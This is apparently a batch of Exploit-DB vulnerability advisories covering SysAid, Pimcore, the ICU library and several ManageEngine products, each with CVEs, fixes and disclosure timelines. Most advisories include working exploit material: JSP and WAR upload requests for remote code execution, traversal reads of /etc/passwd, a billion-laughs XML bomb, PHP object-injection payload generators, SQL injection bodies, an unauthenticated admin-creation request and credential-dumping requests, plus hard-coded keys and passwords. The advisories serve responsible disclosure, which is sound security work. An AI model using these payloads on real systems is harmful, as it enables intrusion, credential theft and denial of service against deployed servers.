Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution)
CVE-2015-2994
Constraints: valid administrator account needed (see #1 to create a valid admin account)
Affected versions: unknown, at least 14.4
POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------81351919525780
-----------------------------81351919525780
Content-Disposition: form-data; name="activation"; filename="whatevs.jsp"
Content-Type: application/octet-stream
<html><body><%out.println(System.getProperty("os.name"));%></body><html>
-----------------------------81351919525780--
The response returns a page which contains the following:
var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";
var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";
if(imageUrl != null && $.trim(imageUrl).length > 0)
{
document.getElementById("cropbox").src = imageUrl;
document.getElementById("preview").src = thumbUrl;
parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp";
Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP.
3)
Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution)
CVE-2015-2995
Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details.
Affected versions: unknown, at least 14.3 and 14.4
POST /sysaid/rdslogs?rdsName=../../../../sample.war%00
<... WAR payload here ...>
4)
Vulnerability: Arbitrary file download
CVE-2015-2996 (same CVE as #8)
Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path)
Affected versions: unknown, at least 14.4
GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
5)
Vulnerability: Path disclosure
CVE-2015-2997
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4; only works on the Linux version
POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>
Metasploit PoC:
large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
'method' => 'POST',
'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
'ctype' => 'application/octet-stream',
'vars_get' => {
'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),
'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))
}
})
The response (res.body.to_s) will be similar to:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Error</TITLE></HEAD>
<BODY>
<H1>Internal Error No#14</H1>
<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2>
</BODY></HTML>
The tomcat path is revealed between the H2 tags.
6)
Vulnerability: Use of hard-coded cryptographic key
CVE-2015-2998
Constraints: N/A
Affected versions: unknown, at least 14.4
SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file.
Algorithm: DES password based encryption with MD5 hash
Key: "inigomontoya"
Salt: [-87, -101, -56, 50, 86, 53, -29, 3]
Iterations: 19
7)
Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp
CVE-2015-2999
Constraints: valid administrator account needed
Affected versions: unknown, at least 14.4
a)
POST /sysaid/genericreport HTTP/1.1
action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin
action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no
action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin
Parameters:
groupFilter
customSQL
(3 sample payloads are shown - the reportName has to be valid and each reportName expects different parameters)
b)
POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE
resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=
Parameter:
dir
c)
POST /sysaid/RFCGantt.jsp HTTP/1.1
listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true
Accepts injection between $$ in ganttSQL parameter.
8)
Vulnerability: Denial of service
CVE-2015-2996 (same CVE as #4)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero
This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).
9)
Vulnerability: XML Entity Expansion (leading to denial of service)
CVE-2015-3000
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
a)
POST /sysaid/agententry?deflate=0
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
b)
POST /sysaid/rdsmonitoringresponse
<lol bomb in POST data>
c)
POST /sysaid/androidactions
<lol bomb in POST data>
These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).
10)
Vulnerability: Uncontrolled file overwrite
CVE-2015-2993 (same CVE as #1)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm
This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker.
11)
Vulnerability: Use of hard-coded password for the SQL Server Express administrator account
CVE-2015-3001
Constraints: N/A
Affected versions: unknown, at least 14.4
When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1".
>> Fix:
Upgrade to version 15.2 or higher.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

202
exploits/hardware/webapps/43886.txt Normal file
View file

@ -0,0 +1,202 @@
> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
====================================================================
Disclosure: 14/04/2014 / Last updated: 12/10/2014
Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2921)
Vulnerability: Arbitrary file deletion in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2922)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)
Summary:
This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from [3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all PHP versions.
Versions affected:
1.4.9 to 1.4.10 (inclusive) / 2.0.0 (possibly): Remote code execution (when server is running PHP <= 5.3.3).
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.
Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not possible, but the requirement was only enforced in 2.0.1.
Note that however the underlying vulnerability for both the remote code execution and the arbitrary file deletion is the same (unserialize() object injection), so it might be possible to execute code if any other Zend PHP POP chains are found in the future.
Fix for vulnerability:
https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280
Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):
https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7
PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):
https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b
Code snippets:
pimcore/lib/Pimcore/Tool/Newsletter.php(221):
public function getObjectByToken($token) {
$data = unserialize(base64_decode($token));
if($data) {
if($object = Object_Abstract::getById($data["id"])) {
if($version = $object->getLatestVersion()) {
$object = $version->getData();
}
This function is called in the same file in confirm() and unsubscribeByToken():
public function confirm($token) {
$object = $this->getObjectByToken($token);
if($object) {
public function unsubscribeByToken ($token) {
$object = $this->getObjectByToken($token);
if($object) {
In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
public function confirmAction() {
$this->enableLayout();
$this->view->success = false;
$newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)
if($newsletter->confirm($this->getParam("token"))) {
$this->view->success = true;
}
And also in unsubscribeAction():
public function unsubscribeAction() {
$this->enableLayout();
$newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)
$unsubscribeMethod = null;
$success = false;
if($this->getParam("email")) {
$unsubscribeMethod = "email";
$success = $newsletter->unsubscribeByEmail($this->getParam("email"));
}
if($this->getParam("token")) {
$unsubscribeMethod = "token";
$success = $newsletter->unsubscribeByToken($this->getParam("token"));
}
Mitigation:
Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.
References:
========================================================
[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)
<?php
class Zend_Search_Lucene_Index_FieldInfo
{
public $name = '<?php phpinfo(); die;?>';
}
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
protected $_dirPath = null;
public function __construct($path)
{
$this->_dirPath = $path;
}
}
interface Zend_Pdf_ElementFactory_Interface {}
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
protected $_docCount = 1;
protected $_name = 'foo';
protected $_directory;
protected $_fields;
protected $_files;
public function __construct($directory, $fields)
{
$this->_directory = $directory;
$this->_fields = array($fields);
$this->_files = new stdClass;
}
}
class Zend_Pdf_ElementFactory_Proxy
{
private $_factory;
public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
{
$this->_factory = $factory;
}
}
// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);
echo base64_encode(serialize($____proxy));
?>
========================================================
[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
[3] http://www.exploit-db.com/exploits/19573
========================================================
[4] Arbitrary file deletion, all PHP versions
<?php
class Zend_Http_Response_Stream
{
protected $stream;
protected $stream_name;
protected $_cleanup;
public function setStream($stream)
{
$this->stream = $stream;
return $this;
}
public function setCleanup($cleanup = true) {
$this->_cleanup = $cleanup;
}
public function setStreamName($stream_name) {
$this->stream_name = $stream_name;
return $this;
}
}
$resp = new Zend_Http_Response_Stream();
$resp->setStream(null);
$resp->setCleanup();
$resp->setStreamName("/tmp/deleteme");
echo base64_encode(serialize($resp));
?>
========================================================
[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter
[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip). The file mentioned is website/controllers/NewsletterController.php.
Other references:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://vagosec.org/2013/12/wordpress-rce-exploit/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

83
exploits/multiple/local/43887.txt Normal file
View file

@ -0,0 +1,83 @@
>> Heap overflow and integer overflow in ICU library (v52 to v54)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 04/05/2015 / Last updated: 07/05/2015
>> Background on the affected products:
ICU is a mature, widely used set of C/C++ and Java libraries providing Unicode and Globalization support for software applications. ICU is widely portable and gives applications the same results on all platforms and between C/C++ and Java software.
>> Summary:
While fuzzing LibreOffice an integer overflow and a heap overflow were found in the ICU library. This library is used by LibreOffice and hundreds of other software packages.
Proof of concept files can be downloaded from [1]. These files have been tested with LibreOffice 4.3.3.2 and LibreOffice 4.4.0-beta2 and ICU 52.
Note that at this point in time it is unknown whether these vulnerabilities are exploitable.
Thanks to CERT [2] for helping disclose these vulnerabilities.
>> Technical details:
#1
Vulnerability: Heap overflow
CVE-2014-8146
The code to blame is the following (from ubidi.c:2148 in ICU 52):
dirProp=dirProps[limit-1];
if((dirProp==LRI || dirProp==RLI) && limit<pBiDi->length) {
pBiDi->isolateCount++;
pBiDi->isolates[pBiDi->isolateCount].stateImp=stateImp;
pBiDi->isolates[pBiDi->isolateCount].state=levState.state;
pBiDi->isolates[pBiDi->isolateCount].start1=start1;
}
else
processPropertySeq(pBiDi, &levState, eor, limit, limit);
Under certain conditions isolateCount is incremented too many times, which results in several out of bounds writes. See [1] for a more detailed analysis.
#2
Vulnerability: Integer overflow
CVE-2014-8147
The overflow is on the resolveImplicitLevels function (ubidi.c:2248):
pBiDi->isolates[pBiDi->isolateCount].state=levState.state;
pBiDi->isolates[].state is a int16, while levState.state is a int32.
The overflow causes an error when performing a malloc on pBiDi->insertPoints->points because insertPoints is adjacent in memory to isolates[].
The Isolate struct is defined in ubidiimp.h:184
typedef struct Isolate {
int32_t startON;
int32_t start1;
int16_t stateImp;
int16_t state;
} Isolate;
LevState is defined in ubidi.c:1748
typedef struct {
const ImpTab * pImpTab; /* level table pointer */
const ImpAct * pImpAct; /* action map array */
int32_t startON; /* start of ON sequence */
int32_t startL2EN; /* start of level 2 sequence */
int32_t lastStrongRTL; /* index of last found R or AL */
int32_t state; /* current state */
int32_t runStart; /* start position of the run */
UBiDiLevel runLevel; /* run level before implicit solving */
} LevState;
>> Fix:
All ICU releases between 52 and 54 are affected. Upgrade to ICU 55.1 to fix these vulnerabilities.
There are many other software packages which embed the ICU code and will need to be updated.
Patches that fix these vulnerabilities can be obtained from the ICU project in [3] and [4].
>> References:
[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43887.zip)
[2] https://www.kb.cert.org/vuls/id/602540
[3] http://bugs.icu-project.org/trac/changeset/37080
[4] http://bugs.icu-project.org/trac/changeset/37162
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

79
exploits/multiple/webapps/39288.txt
View file

@ -11,3 +11,82 @@ ManageEngine IT360 8 through 10.1.1 build 10110
www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]
>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015
>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.
>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.
#1
Vulnerability:
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996
Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]
IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]
#2
Vulnerability:
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360)
CVE-2014-3997
Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
PMP:
GET /MetadataServlet.dat?sv=[SQLi]
IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

52
exploits/multiple/webapps/43892.txt Normal file
View file

@ -0,0 +1,52 @@
>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 31/12/2014 / Last updated: 05/01/2015
>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
This vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.
>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards
GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337
This creates a new administrator user "dcpwn" with the password "admin". You can now execute code on all devices managed by Desktop Central!
A Metasploit auxiliary module that exploits this vulnerability has been released.
>> Fix:
(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.
This vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.
Timeline of disclosure:
11/09/2014:
- Vulnerability information sent to Romanus, Desktop Central project manager.
23/09/2014:
- Requested an update. Received reply "My development team is working on this to provide a fix. Let me check this and update you the status."
17/10/2014
- Requested an update. Received reply on the 19th "Due to festive season here i'm unable to get the update. Let me find this and update you by Monday."
30/10/2014
- Requested an update. Received reply "The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing."
23/11/2014
- Requested an update. Received reply on the 24th "I was traveling hence couldn't give you an update. It should get released by next week or early second week. I'll send you an update on this."
15/12/2014
- Requested an update. Received reply on the 18th "it has been handled from the Desktop Central side and awaiting for the release".
31/12/2014
- Released information and exploit 112 days after initial disclosure.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

73
exploits/multiple/webapps/43893.txt Normal file
View file

@ -0,0 +1,73 @@
>> Multiple vulnerabilities in ManageEngine EventLog Analyzer
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 05/11/2014 / Last updated: 05/11/2014
>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more."
>> Technical details:
#1
Vulnerability: SQL database information disclosure (read any table in the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser --> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints
GET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)
#2
Vulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)
A Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.
Timeline of disclosure:
28/08/2014
- Requested contact to email via ManageEngine Security Response Center
- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).
28/08/2014
- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.
31/08/2014
- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).
- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with "We appreciate your efforts and will fix your vulnerabilities, please bear with us".
- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.
11/09/2014
- Asked for an update on progress. Received a response a day after "the development team will include the fix in our next release".
13/10/2014
- Asked for an update on progress. No response.
17/10/2014
- Informed ManageEngine that will release details and an exploit the next day if no reply is received.
19/10/2014
- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.
05/11/2014
- Informed EventLog support that would release details and exploit today. Received reply stating "we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter".
- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

59
exploits/multiple/webapps/43894.txt Normal file
View file

@ -0,0 +1,59 @@
>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2015 / Last updated: 09/02/2015
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."
"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately called FailServlet).
There are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.
#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.
For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
